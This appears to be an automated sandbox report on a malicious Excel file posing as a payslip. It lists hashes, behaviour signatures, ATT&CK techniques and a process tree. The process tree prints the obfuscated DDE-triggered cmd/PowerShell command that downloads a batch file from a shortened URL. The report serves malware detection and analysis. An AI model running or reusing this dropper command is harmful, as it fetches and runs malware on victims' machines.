Analysis

  • max time kernel
    70s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    19-01-2021 07:24

General

  • Target

    PaySlip140121.xls

  • Size

    228KB

  • MD5

    45ce32bf7aa558411aafeb109f0d6e08

  • SHA1

    41b37cc0c3eedb319846fc2a1a6f90b5bcbf16a8

  • SHA256

    e7037dbffd138eb3cb17336a3b50aa9d82613125ce7d66dc7a125f09198e3a82

  • SHA512

    c3ed5c81264f948854f4f40e81f2ffc6479e056bc9486c14f954daec8e23b1e0fd6c5ed0a3f830724f2585d90b9da6b86c11b409f2ba441516be7869ad5e794e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cutt.ly/fjYtydH

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PaySlip140121.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1956
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1736

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1100-2-0x000000002F4D1000-0x000000002F4D4000-memory.dmp
    Filesize

    12KB

  • memory/1100-3-0x0000000071581000-0x0000000071583000-memory.dmp
    Filesize

    8KB

  • memory/1100-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1736-10-0x00000000046F0000-0x00000000046F1000-memory.dmp
    Filesize

    4KB

  • memory/1736-12-0x0000000002412000-0x0000000002413000-memory.dmp
    Filesize

    4KB

  • memory/1736-7-0x00000000765E1000-0x00000000765E3000-memory.dmp
    Filesize

    8KB

  • memory/1736-8-0x000000006C4F0000-0x000000006CBDE000-memory.dmp
    Filesize

    6.9MB

  • memory/1736-9-0x0000000002380000-0x0000000002381000-memory.dmp
    Filesize

    4KB

  • memory/1736-32-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

  • memory/1736-11-0x0000000002410000-0x0000000002411000-memory.dmp
    Filesize

    4KB

  • memory/1736-6-0x0000000000000000-mapping.dmp
  • memory/1736-13-0x0000000002550000-0x0000000002551000-memory.dmp
    Filesize

    4KB

  • memory/1736-14-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

  • memory/1736-17-0x00000000055F0000-0x00000000055F1000-memory.dmp
    Filesize

    4KB

  • memory/1736-22-0x0000000005710000-0x0000000005711000-memory.dmp
    Filesize

    4KB

  • memory/1736-23-0x00000000060F0000-0x00000000060F1000-memory.dmp
    Filesize

    4KB

  • memory/1736-30-0x0000000006250000-0x0000000006251000-memory.dmp
    Filesize

    4KB

  • memory/1736-31-0x0000000006310000-0x0000000006311000-memory.dmp
    Filesize

    4KB

  • memory/1956-5-0x0000000000000000-mapping.dmp